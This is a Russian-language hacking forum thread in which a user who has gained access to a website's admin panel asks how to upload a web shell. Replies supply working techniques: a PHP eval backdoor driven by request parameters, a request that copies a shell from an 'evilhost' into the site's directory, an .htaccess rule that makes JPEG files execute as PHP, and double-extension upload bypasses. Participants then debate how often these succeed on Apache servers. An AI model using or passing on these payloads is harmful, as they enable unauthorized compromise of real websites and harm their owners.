Вчера попал в админку.

А в ней можно только новости в html редактировать, ток вот я попробывал вставить:

Загрузка файлов


PHP:






Отправка файла на серве р

















форма отображается на странице

но файлы я так понял всё равно не загружаются... думаю прав нет.

Есть ещё варианты для загрузки шелла через html ?

Rasta18 said:
Вчера попал в админку.
А в ней можно только новости в html редактировать, ток вот я попробывал вставить:
Загрузка файлов

PHP:






Отправка файла на серве р

















форма отображается на странице
но файлы я так понял всё равно не загружаются... думаю прав нет.
Есть ещё варианты для загрузки шелла через html ?


вариантов вообше нет

жжЁте

по вашему файл сам себя будет копировать на жесткий диск? вы же не обрабатываете файл на стороне сервера

Дык для того, чтобы принять этот файл, на той странице, куда он отправляется (текущей) должен быть и обработчик, не так ли ? Так вы стучите пальцем об стену.

Inoms said:
Дык для того, чтобы принять этот файл, на той странице, куда он отправляется (текущей) должен быть и обработчик, не так ли ? Так вы стучите пальцем об стену.


Видимо именно так.

Неужели действительно нет вариантов??

Rasta18 said:
Видимо именно так.
Неужели действительно нет вариантов??


нет.

Варианты может и есть просто не через правку новостей

Может в админе есть заливка картинок или других файлов ?

next said:
Варианты может и есть просто не через правку новостей
Может в админе есть заливка картинок или других файлов ?



заливка картинок есть, но я к примеру заливаю даже картинку image.gif, а на сервере она сохраняется как 29120000.jpg

это можно обойти?

Rasta18 said:
заливка картинок есть, но я к примеру заливаю даже картинку image.gif, а на сервере она сохраняется как 29120000.jpg
это можно обойти?


Увы. Lfi там случаем нигде нет с возможностью обрезки расширений ? так бы у вас был единственный шанс выполнить там шелл.

Inoms said:
Увы. Lfi там случаем нигде нет с возможностью обрезки расширений ? так бы у вас был единственный шанс выполнить там шелл.


думаю нет.

так как все странички сайта на html, но у меня когда-то доступ к нему был и знаю что оболочка вся на php, ничего кроме xss там не нашлось

Уважаемый ТС, хочу обратить Ваше внимание на одну мелочь - Варианты есть всегда (с)

Что за движок?

можно попробовать вставить php код с бекдором:


PHP:
@php

eval($_REQUEST[e]);

php@

Смотрим абсолютный путь:


HTML:
localhost/?e=phpinfo();

Льем шелл:


HTML:
yoursite.com/news/1.html?e=copy("evilhost/shell.txt","/home/yoursite/shell.php");

Это в свое время сработало на PHPShop CMS, кстати не так давно....

Это как вариант номер раз)

Вариант номер 2.1:

Можно попробовать залить вместо картинки файл shell.php.jpg , допустим обработчик переименует его в 12312312312.php.jpg - это может прокатить, при определенных конфигах сервера....

Вариант 2.2:

Также можно попробовать залить shell.jpg

Предварительно залив .htaccess следующего содержания:


HTML:
AddType application/x-httpd-php .jpg

Тогда сервер будет обрабатывать .jpg файлы как приложение php и переименованный шелл с новым названием 123123123123.jpg отработает как пых файл)

Вариант 2.3:

Попробуй залить файл shell.php.g1f или shell.php.ololo

файл shell.php.ololo имеет неизвестный формат, т.к. апачу не знакомо расширение .ololo он начнет обрабатывать наш шелл как PHP файл.

PS а вообще, я уверен, что это далеко не все способы которые можно попробовать заливаясь из админки...

умники собрались

Тake_IT

"@php

eval($_REQUEST[e]);

php@ "

ты где встречал такие теги "@php php@" ?

если в каком то темплейт двиге оно используется как пхп тег это не значит что оно везде будет работать.

тс сказал что залить можно картинки, с чего ты взял что можно загрузить хтакцесс?

"12312312312.php.jpg - это может прокатить, при определенных конфигах сервера...."

ага, определенные конфиги, какой даун админ будет настроить сервер на обработку jpeg как php

такие методы могут сработать в конкретных двигах, но в общем случай писать о них как о методах заливки шелла это глупо.

Konqi said:
умники собрались


Раньше ты попроще был))


Konqi said:
"@php
eval($_REQUEST[e]);
php@ "
ты где встречал такие теги "@php php@" ?
если в каком то темплейт двиге оно используется как пхп тег это не значит что оно везде будет работать.


эти теги я встречал минимум в 3 движках phpshop cms , Instant Update CMS, Blox CMS, могу еще вспомнить....


Konqi said:
тс сказал что залить можно картинки, с чего ты взял что можно загрузить хтакцесс?


учитывая то, что ТС совсем зеленый, я предположил что он может не совсем правильно описывать ситуацию, в частности, с загрузкой файлов. поэтому решил напомнить про несколько несложных методов)


Konqi said:
"12312312312.php.jpg - это может прокатить, при определенных конфигах сервера...."
ага, определенные конфиги, какой даун админ будет настроить сервер на обработку jpeg как php
такие методы могут сработать в конкретных двигах
, но в общем случай писать о них как о методах заливки шелла это глупо.


случаев когда файлы .php.gif запускаются - масса, на моей памяти это примерно 15-20%

в конкретных двигах говорите?) а мы знаем с каким двигом столкнулся ТС ? а вдруг это тот самый, "конкретный"??

PS мне кажется от твоего совета было бы больше проку, чем от критики)

Take_IT said:
Раньше ты попроще был))
а ты наверное с другого акка сидел.
PS мне кажется от твоего совета было бы больше проку, чем от критики)


я выше уже отписался, что если нету конкретной инфы о двиге, то не имеет смысла описать какие то левые методы которые работают с очень низкой частотой

Konqi said:
я выше уже отписался, что если нету конкретной инфы о двиге, то не имеет смысла описать какие то левые методы которые работают с очень низкой частотой


ну извините бл* )) если случаев, когда .php.gif обрабатывается как пхп 15-20% (1 из 5\6 - оказывается для тебя этого мало) , то этими способами похекалось минимум половина всех CMS которые я изучал)) а ты говоришь про низкую частоту...

PS ага, пароль потерял, давно не заходил сюда)

Take_IT said:
ну извините бл* )) если случаев, когда .php.gif обрабатывается как пхп 15-20% (1 из 5\6 - оказывается для тебя этого мало) , то этими способами похекалось минимум половина всех CMS которые я изучал)) а ты говоришь про низкую частоту...
PS ага, пароль потерял, давно не заходил сюда)


Бред пишешь. Если " .php.gif обрабатывается как пхп 15-20%" это всего лишь означает, что эти 20% были похеканы кем-то ранее. Ни одна нормальная CMS (без бэкдоров), ни один адекватный админ (не обкуренный) не позволит выполняться картинкам как пхп-код.

Что-то прям из научной фантастики. Я согласен ещё на .ololo с натяжкой - да, встречается. Но вышепредложенное - вообще бред чистой воды.

З.Ы. А залейте вообще *.txt. Вдруг выполнится как php? Ну а вдруг?

опачки! одепты подтянулись)))

Ох, ну ничего себе кто меня учить собрался))))


BigBear said:
Бред пишешь. Если " .php.gif обрабатывается как пхп 15-20%" это всего лишь означает, что эти 20% были похеканы кем-то ранее. Ни одна нормальная CMS (без бэкдоров), ни один адекватный админ (не обкуренный) не позволит выполняться картинкам как пхп-код.


да я и не утверждаю что нормальный человек так настроит сервер суть не в том из за чего это работает(админ дурак или серв похекали раньше), суть в том, что это работает(фактически) и с достаточно большой вероятностью, пусть это будет даже 1 сервер из 10...

А про то, как в нормальных CMS появляются бекдоры, я расскажу немного позже) как раз снял видео на эту тему


BigBear said:
Что-то прям из научной фантастики. Я согласен ещё на .ololo с натяжкой - да, встречается. Но вышепредложенное - вообще бред чистой воды.


с натяжкой?) а объясни почему это сработает не всегда и почему вообще работает?)

file.php.ololo имеет неизвестное для апача расширение .ololo поэтому он будет обрабатывать file.php.ololo точно также как и file.php. а знаешь почему?? потому, что в случае если апач встречает файл с незнакомым расширением он начинает искать знакомое расширение с конца имени файла, т.е. фактически, если бы мы залилиfile.php.txt.ololo он бы выполнился как .txt. А не сработает это в том случае, если в дире куда льем файл не выполняется пых

Зы вам че, квестики перестали делать?)) плохо, мозги как и мышцы надо тренировать))) И кстати, если для тебя вышеописанное фантастика, почитай хоть темы роа за 2009-2011 года, помнится там было много примеров)


BigBear said:
З.Ы. А залейте вообще *.txt. Вдруг выполнится как php? Ну а вдруг?


троллинг не засчитан, тренируйтесь лучше на кошках (с)

Take_IT said:
file.php.ololo
имеет неизвестное для апача расширение .ololo поэтому он будет обрабатывать
file.php.ololo
точно также как и
file.php


http://screenshotuploader.com/i/1312/79zyz.png

Konqi said:
http://screenshotuploader.com/i/1312/79zyz.png


пардон, я не говорю что от этого нет никакой защиты и это работает в 100%, но ведь на локалке, в искусственных условиях, можно добиться самого разного результата и сделать что угодно)

Какие там требования чтоб file.php.unknown_extension выполнялся как .php напомните пожалуйста.

mod_mime enabled кажется, и что-то ещё видимо. У меня на локалке mod_mime вроде стоит, а код не выполняется.

Take_IT said:
пардон, я не говорю что от этого нет никакой защиты и это работает в 100%, но ведь на локалке, в искусственных условиях, можно добиться самого разного результата и сделать что угодно)


я никакой защиты не ставил,


но ведь на локалке, в искусственных условиях


у меня дефолтные настройки апача, никаких искуственных условий

просто ты утверждаешь что такие фичи работают на многих серверах и не по ошибке админа. а мы говорим нет - как заметил бигбир такое бывает или в тех случаях когда сайт уже был похекан, или же когда админ обкуренный

Konqi said:
я никакой защиты не ставил,
у меня дефолтные настройки апача, никаких искуственных условий
просто ты утверждаешь что такие фичи работают на многих серверах и не по ошибке админа. а мы говорим нет - как заметил бигбир такое бывает или в тех случаях когда сайт уже был похекан, или же когда админ обкуренный


да я как бы с вами и не спорю просто дискуссия началась с того, что меня "назвали дураком" грубо говоря...))) мол, "к чему ты это написал вообще" . вот я и пытаюсь объяснить свою позицию в отношении того, почему я порекомендовал данный вариант - лишь потому, что в определенном ряде случаев это помогает добиться фактического результата) и нет никакой уверенности в том, что админ целевого сервера не курит))

тс просил не разжевать ему теорию, а дать практический совет который помог бы ему залиться в данном случае! С учетом того, что в его ситуации практически не из чего выбирать я посоветовал ему эти способы)

дико извиняюсь, если кого то это затронуло за живое

ЗЫ всех с Наступающим))